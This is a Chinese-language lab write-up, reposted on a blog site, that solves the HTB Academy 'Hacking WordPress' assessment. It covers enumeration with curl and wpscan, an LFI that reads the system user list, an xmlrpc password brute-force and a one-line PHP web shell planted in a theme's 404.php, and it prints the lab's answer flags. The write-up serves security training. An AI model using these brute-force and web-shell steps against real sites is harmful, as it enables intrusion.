HTB ACADEMY-Hacking WordPress WRITE UP

这篇具有很好参考价值的文章主要介绍了HTB ACADEMY-Hacking WordPress WRITE UP。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

You have been contracted to perform an external penetration test against the company INLANEFREIGHT that is hosting one of their main public-facing websites on WordPress.
Enumerate the target thoroughly using the skills learned in this module to find a variety of flags. Obtain shell access to the webserver to find the final flag.

准备工作

  • 基本信息
  1. 操作对象:Vmware Station(Kali-Linux)
  2. 目标实例对象:10.129.72.202

第一个问题

Identify the WordPress version number.

首先,我们需要知道目标机器运行的WordPress版本号,通常版本号的信息都放在blog页面,但我们如果直接点击blog页面是无法打开的(DNS解析存在错误),我们需要将blog页面的域名加入到本地hosts文件内。

sudo sh -c ‘echo “10.129.72.202 inlanefreight.local” >> /etc/hosts’

HTB ACADEMY-Hacking WordPress WRITE UP

这时我们浏览器再次访问blog页面就可以正常显示了。于是我们查看下blog页面的源代码。简单搜索一下关键词就能找到WordPress版本号。

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

答案:5.1.6

第二个问题

Identify the WordPress theme in use.

这个没什么好说的,查看WordPress用的主题名称,直接在源代码简单搜索就能找到。

HTB ACADEMY-Hacking WordPress WRITE UP

答案:twentynineteen

第三个问题

Submit the contents of the flag file in the directory with directory listing enabled.

枚举一下当前页面用的插件有哪些,可以看到有三个分别是:the-events-calendar,email-subscribers,site-editor。我们可以在浏览器里去挨个查看目录文件。但是因为可以查看到的文件太多了,找flag跟大海捞针一样,而且我把三个插件的文件夹几乎都翻了一遍也没有找到flag文件的影子。

 curl -s -X GET http://blog.inlanefreight.local | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

所以我后来使用了dirbuster工具(当然也可以使用其他模糊测试的工具),别的也不想要就想找到flag,所以我把名称字典框死在“flag”上,让它跑得稍微快一点。

dirbuster

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

不久后我们就可以看到flag位于/wp-content/uploads/upload_flag.txt,在浏览器可以直接查看内容。

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

答案:HTB{d1sabl3_d1r3ct0ry_l1st1ng!}

第四个问题

Identify the only non-admin WordPress user.

一开始看到这个问题我想的是去?author=1不断尝试有哪些用户,但我这样只枚举出两个用户,一个是admin,另一个是erika,但这两个用户名称都不符合问题的格式要求。

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

所以,我直接用WPSCAN进行扫描(如果没有WPSCAN API TOKEN的话需要去WPSCAN官网注册后申请)。扫完就发现还有另外一个用户。

wpscan --url http://blog.inlanefreight.local --enumerate --api-token XXX

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

答案:Charlie Wiggins

第五个问题

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

问题提示说利用插件漏洞实现无身份认证的文件下载,我们查看下WPSCAN扫描结果的报告,然后打开相关链接详细了解漏洞利用方式和作用。其中有一个能够实现此目的。

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

我们按照链接提供的方式就能获取到flag。

HTB ACADEMY-Hacking WordPress WRITE UP

答案:HTB{unauTh_d0wn10ad!}

第六个问题

What is the version number of the plugin vulnerable to an LFI?

还是查看WPSCAN报告就能找到答案。

HTB ACADEMY-Hacking WordPress WRITE UP

答案:1.1.1

第七个问题

Use the LFI to identify a system user whose name starts with the letter "f".

和上面第六个问题是连续的,打开LFI相关漏洞链接,链接内告诉我们利用的方式。

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

我们按照链接所给方法,可以看到系统用户列表,其中只有一个是以字母“f”开头的。

HTB ACADEMY-Hacking WordPress WRITE UP

答案:frank.mclane

第八个问题

Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

想找到该flag,意味着我们至少要有erika用户的权限。我们使用WPSCAN对erika用户的密码进行暴力破解(这里使用了rockyou.txt字典)。

wpscan --password-attack xmlrpc -t 20 -U erika -P /home/yangchen/桌面/rockyou.txt --url http://blog.inlanefreight.local

HTB ACADEMY-Hacking WordPress WRITE UP

很快,不到一分钟我们就得到了erika用户的密码(erika/010203),这简直不要太顺利。然后我本想直接使用msfconsole在目标机器运行反向shell然后就成了,但是msfconsole不知道因为何种缘故自动渗透失败了,所以我只好手动去后台修改主题编辑器。

HTB ACADEMY-Hacking WordPress WRITE UP

我们登录到WordPress后台管理系统,然后修改twentyseventeen主题下的404.php,增加一行cmd命令。
这里需要注意的是,WordPress 4.9版本之后有一个非常致命的BUG,导致修改PHP文件不成功。社区上存在很多解决方法,相关链接1,相关链接2,相关链接3。无一例外的是都指向一条判断语句if( $is_active && ‘php’ === $extension ),所以解决的思路也非常简单,我们只需要修改当前非活跃的主题的PHP文件,修改完成后再激活该主题即可。

system($_GET['cmd']);

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

修改页面成功后我们查看下当前用户id为www-data。

curl -X GET "http://blog.inlanefreight.local/wp-content/themes/twentyseventeen/404.php?cmd=id"

HTB ACADEMY-Hacking WordPress WRITE UP

虽然id命令运行得非常正常,但是当我们换成其他命令后,目标机器返回给我们不认识该指令。

HTB ACADEMY-Hacking WordPress WRITE UP

出现该错误的原因是编码格式问题,即需要将传参转化为URL编码格式。于是我找了一个在线URL编码解码的网站,将需要的命令进行转化然后拿到了flag。

HTB ACADEMY-Hacking WordPress WRITE UP

HTB ACADEMY-Hacking WordPress WRITE UP

答案:HTB{w0rdPr355_4SS3ssm3n7}文章来源地址https://www.toymoban.com/news/detail-457558.html

到了这里,关于HTB ACADEMY-Hacking WordPress WRITE UP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 信息收集之Google Hacking

    GoogleHacking作为常用且方便的信息收集 搜索引擎工具 ,它是利用谷歌搜索强大,可以搜出不想被看到的后台、泄露的信息、未授权访问,甚至还有一些网站配置密码和网站漏洞等。掌握了Google Hacking基本使用方法,或许下一秒就是惊喜! GoogleHacking语法: https://www.exploit-db.co

    2024年02月06日
    浏览(29)
  • Sat-Hacking(3):Starlink终端逆向分析

    Starlink终端是SpaceX推出的卫星互联网终端设备,它的目的是为了提供高速、低延迟的卫星互联网服务。该终端设备采用了一种平板天线设计,可以自动搜索、跟踪并连接卫星信号,同时还具有数据处理、无线网络传输等多种功能。在 Starlink 卫星互联网系统中,用户设备端采用

    2024年02月15日
    浏览(69)
  • Sat-Hacking(2):Starlink卫星通信频段

    了解卫星通信频段是学习卫星安全的基础理论知识,卫星通信频段是指用于卫星通信的无线电波频谱范围。在卫星通信中,无线电波在地面站与卫星之间传输信息,实现通信和数据传输。为了使各种卫星和地面系统之间的通信有效且互不干扰,国际电信联盟(ITU)将频谱划分

    2024年02月06日
    浏览(37)
  • Sat-Hacking(4):Starlink路由器逆向分析-上篇

    在本篇文章中,我们将探讨 SpaceX Starlink 路由器的逆向分析过程。Starlink 是 SpaceX 推出的一项革命性的卫星互联网服务,旨在为全球偏远地区提供高速、低延迟的互联网连接。为了实现这一目标,Starlink 需要一个高性能的路由器来管理用户的互联网连接。逆向分析这种设备对于

    2024年02月10日
    浏览(49)
  • 相关搜索引擎常用搜索语法(Google hacking语法和FOFA语法)

    一:Google Hack语法      Google Hacking原指利用Google搜索引擎搜索信息来进行入侵的技术和行为,现指利用各种搜索引擎并使用一些高级的搜索语法来搜索信息。既利用搜索引擎强大的搜索功能,在在浩瀚的互联网中搜索到我们需要的信息。 (一)常用基本搜索语法 1)完整搜

    2024年02月12日
    浏览(57)
  • 利用Sqlmap API接口联动Google Hacking批量SQL注入检测

    目录 前言 slghack自动化搜集URL Sqlmap API 脚本slghack_sqli 挖掘SQL注入漏洞的一种方式就是通过Google Hacking搜索那些可能存在SQL的URL,然后手工的探测注入点。但是现在的SQL注入漏洞的网站是比较少的了,所以这样一个一个手工测效率有一点低。 sqlmap比较好的一点是可批量扫描多个

    2024年04月14日
    浏览(34)
  • HTB-Nineveh

    目录扫描 /info.php目录 目录扫描 这完全没头绪,估计是信息收集漏了东西,重新来一遍。 哈,我就知道。 当我输入admin会发现抱错变成了密码不可用,说明admin用户存在。 没有任何提示,尝试一下hydra的暴力破解。 多了张图片 secure_notes 。 对443登录进行hydra暴力破解, hydra

    2024年02月01日
    浏览(38)
  • HTB-DevOops

    根据文字所述,下面的图片是feed.py。 目录扫描 /upload如下: 上传测试xml文件。 得到反馈 怀疑是标签不匹配,尝试寻找匹配的标签。前面首页有提示: XML elements: Author, Subject, Content 。 构造XML如下: XEE利用,外部实体访问/etc/passwd。 找找看feed.py在哪里,就在当前目录下。 有

    2023年04月26日
    浏览(35)
  • HTB靶场之-inject

    攻击机:虚拟机kali。 靶机:Inject,htb网站:https://www.hackthebox.com/,靶机地址:https://app.hackthebox.com/machines/Inject。 知识点:ansible提权(非漏洞提权)、本地文件包含漏洞、CVE-2022-22963、敏感信息发现。 使用nmap扫描下端口对应的服务:nmap -T4 -sV -p22,80,8080,3306 -A 10.10.11.204,显示

    2024年02月04日
    浏览(44)
  • htb inject

    2024年02月05日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包